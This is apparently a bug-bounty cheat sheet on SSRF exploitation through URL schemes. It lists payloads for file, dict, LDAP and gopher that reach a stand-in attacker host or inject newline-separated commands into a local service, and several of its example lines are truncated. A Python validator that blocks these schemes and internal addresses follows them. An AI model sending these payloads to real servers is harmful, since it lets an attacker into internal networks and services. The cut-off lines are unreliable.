SSRF exploitation via URL Scheme

1-File: Allows an attacker to fetch the content of a file on the server.


2-HTTP: Allows an attacker to fetch any content from the web; it can also be used to scan ports.
ssrf.php?url=
ssrf.php?url=
ssrf.php?url=

3-Dict: The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol.
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/

4-SFTP: A network protocol used for secure file transfer over secure shell.
ssrf.php?url=s

5-TFTP: Trivial File Transfer Protocol, works over UDP.
ssrf.php?url=t

6-LDAP: An application protocol used over an IP network to manage and access the distributed directory information service.
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit

7-Gopher HTTP:
gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A
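All seven schemes above depend on the server fetching whatever the url parameter holds, so the defensive counterpart is a check run before any fetch. The following is an added example, not code from the original post; the names check_url, ALLOWED_SCHEMES, ALLOWED_PORTS and the resolve parameter are hypothetical, and the http/https-only policy is an assumption.

```python
import ipaddress
import socket
from urllib.parse import unquote, urlsplit

# Assumed policy (not from the page): the fetcher only needs public web content.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def _resolve(host):
    """Default resolver: every address the host name maps to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def check_url(url, resolve=_resolve):
    """Return (allowed, reason) for a user-supplied url parameter."""
    # Percent-encoded CR/LF (as in %0astats%0aquit) smuggles extra protocol lines.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in unquote(url)):
        return False, "control character in URL"
    try:
        parts = urlsplit(url)
        port = parts.port
    except ValueError:
        return False, "malformed URL"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:  # rejects file, dict, sftp, tftp, ldap, gopher
        return False, f"scheme not allowed: {scheme or '(none)'}"
    if parts.username or parts.password or not parts.hostname:
        return False, "missing host or embedded credentials"
    if port is None:
        port = 443 if scheme == "https" else 80
    if port not in ALLOWED_PORTS:  # blocks port scanning through the fetcher
        return False, f"port not allowed: {port}"
    try:
        addresses = resolve(parts.hostname)
    except OSError:
        return False, "host does not resolve"
    for addr in addresses:
        # Loopback, private, link-local and metadata ranges are not global.
        if not ipaddress.ip_address(addr).is_global:
            return False, f"non-public address: {addr}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample inputs; two are the page's own dict and ldap examples.
    for sample in ("file:///etc/passwd", "dict://attacker:11111/",
                   "ldap://localhost:11211/%0astats%0aquit", "http://127.0.0.1:22/"):
        print(sample, "->", check_url(sample))
```

The fetch itself must connect to the address that was validated and re-run the check on every redirect; otherwise a second DNS lookup or a redirect can still reach an internal host.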



#SSRF #exploitation #BugBounty
